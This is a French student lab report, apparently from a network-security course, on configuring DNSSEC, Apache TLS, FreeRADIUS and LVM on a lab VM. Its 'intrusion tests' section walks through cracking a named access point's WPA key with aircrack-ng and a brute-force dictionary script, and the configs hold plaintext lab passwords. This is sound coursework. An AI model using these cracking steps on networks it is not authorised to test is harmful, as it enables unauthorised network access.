Création de la clef asymétrique de la zone pour signer les enregistrements :<br />
<br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE hercule.space<br />
<br />
On renomme ces clef : <br />
hercule.space-ksk.key<br />
hercule.space-zsk.key<br />
<br />
Puis on les inclus dans le fichier /etc/bind/db.hercule.space<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-ksk.key<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-zsk.key<br />
<br />
On signe les enregistrements de la zone :<br />
dnssec-signzone -o hercule.space -k hercule.space-ksk ../db.hercule.space hercule.space-zsk<br />
<br />
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe .signed :<br />
file "/etc/bind/db.hercule.space.signed";<br />
<br />
On communique les parties publiques de la KSK et ZSK à Gandi dans l'onglet DNSSEC. On n'oublie pas également d'incrémenter le SERIAL dans le fichier db.hercule.space.<br />
<br />
===Serveur Apache===<br />
<br />
<br />
Création du dossier /var/www/www.hercule.pw<br />
<br />
*''' Certification SSL :'''<br />
<br />
Génération du Certificate Signing Request (CSR) pour Gandi sur la VM :<br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout hercule.pw.key -out hercule.pw.csr<br />
<br />
On copie le contenu de la clé générée sur Gandi. Pour valider la certification SSL, on choisi la méthode par DNS Record. On ajoute alors l'enregistrement CNAME proposé par Gandi dans notre configuration de zone sur la VM. Il faut maintenant patienter le temps du traitement. <br />
<br />
*'''Configuration Apache :'''<br />
<br />
Configuration du serveur web dans le fichier /etc/apache2/sites-available/hercule.space.conf<br />
<br />
<VirtualHost 193.48.57.183:443><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
DocumentRoot /var/www/html/<br />
CustomLog /var/log/apache2/secure_acces.log combined<br />
<br />
SSLEngine on<br />
SSLCertificateFile /etc/ssl/certs/www.hercule.space.crt<br />
SSLCertificateKeyFile /etc/ssl/private/hercule.space.key<br />
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem<br />
SSLVerifyClient None<br />
</VirtualHost><br />
<br />
<VirtualHost 193.48.57.183:80><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
Redirect / https://www.hercule.space<br />
</VirtualHost><br />
<br />
<br />
Modification du fichier ports.conf pour que le serveur web écoute sur le port 443 :<br />
<br />
Listen 80 443<br />
<br />
On active enfin le module SSL, notre site, et on redémarre le service apache :<br />
a2enmod ssl<br />
a2ensite hercule.space.conf<br />
service apache2 restart<br />
<br />
===Serveur Freeradius===<br />
<br />
Installation de Freeradius sur la vm :<br />
apt-get install freeradius<br />
<br />
On ajoute ensuite un utilisateur au serveur freeradius. Pour cela, dans le fichier /etc/freeradius/3.0/users on ajoute : <br />
hercule Cleartext-Password := "glopglop"<br />
<br />
Il nous est demandé de configurer le serveur en PEAP-MSCHAPv2. Pour cela, on modifie les fichiers : <br />
<br />
- /etc/freeradius/mods-enabled/eap.conf :<br />
default_eap_type = peap<br />
<br />
- /etc/freeradius/mods-enabled/mschap :<br />
use_mppe = yes<br />
require_encryption = yes<br />
require_strong = yes<br />
with_ntdomain_hack = yes<br />
<br />
<br />
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :<br />
client 192.168.0.10/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
client 192.168.0.11/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
<br />
On met à jour la configuration : <br />
ldconfig<br />
<br />
== 5. Tests d'intrusion ==<br />
===Crackage de clé WPA===<br />
<br />
Afin de lancer le crackage de clé WPA sur le point d'accès cracotte07, nous avons besoin du package aircrack-ng que nous installons. Nous affichons ainsi nos interfaces avec la commande :<br />
<br />
$ iwconfig<br />
<br />
Nous lançons alors airmon-ng avec notre interface wifi (wlp2s0) :<br />
<br />
$ airmon-ng start wlp2s0mon<br />
<br />
Nous affichons ensuite tout les point d'accés environnants en utilisant la commande :<br />
<br />
$ airodump-ng wlp2s0mon<br />
<br />
Nous capturons des paquets provenants de cracotte07 que nous enregistrons dans un fichier :<br />
<br />
$ airodump-ng -c 9 --bssid 04:DA:d2:9C:50:56 -w ./path_to_folder/cracotte07 wlp2s0mon<br />
<br />
Une fois les fichiers générés, nous les transférons sur une ZABETH. Avant de lancer le craquage, nous devons générer un dictionnaire contenant toutes les combinaisons possibles de 8 chiffres. Pour cela, nous réalisons le script bash suivant :<br />
<br />
#!/bin/bash<br />
charset=({0..9})<br />
permute(){<br />
(($1 == 0)) && { echo "$2"; return; }<br />
for char in "${charset[@]}"<br />
do<br />
permute "$((${1} - 1 ))" "$2$char"<br />
done<br />
}<br />
permute "$1"<br />
<br />
Que nous laçons en exécutant :<br />
<br />
$ ./comb.sh 8 >> dictionnaire.txt<br />
<br />
Le crack est effectué en lançant la commande :<br />
<br />
$ aircrack-ng -a2 -b 04:DA:D2:9C:50:56 -w /path_to_file/dictionnaire.txt /path_to_file/*.cap<br />
<br />
Nous récupérons la clé après quelques heures de calcul :<br />
<br />
[[Fichier:Crack groupe7.png|600px]]<br />
<br />
== 6. Réalisation ==<br />
<br />
===6.1 Sécurisation de données===<br />
<br />
Création de trois partitions LVM de 1Go sur Cordouan : <br />
lvcreate -L 1G -n /dev/virtual/hercule1 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule2 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule3 -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes :<br />
<br />
'phy:/dev/virtual/hercule1,xvdc1,w',<br />
'phy:/dev/virtual/hercule2,xvdc2,w',<br />
'phy:/dev/virtual/hercule3,xvdc3,w'<br />
<br />
On relance la VM. On formate les disques créés sur la machine :<br />
<br />
mkfs -t ext4 /dev/xvdc1<br />
mkfs -t ext4 /dev/xvdc2<br />
mkfs -t ext4 /dev/xvdc3<br />
<br />
Afin de lier les dossiers /hercule1 /hercule2 /hercule3 de notre vm au disques créé précédemment, on modifie le fichier /etc/fstab en y ajoutant les lignes suivantes :<br />
<br />
/dev/xvdc1 /hercule1 ext4 defaults 0 2<br />
/dev/xvdc2 /hercule2 ext4 defaults 0 2<br />
/dev/xvdc3 /hercule3 ext4 defaults 0 2<br />
<br />
Puis on effectue le montage :<br />
<br />
mount -a</div>Mcreteur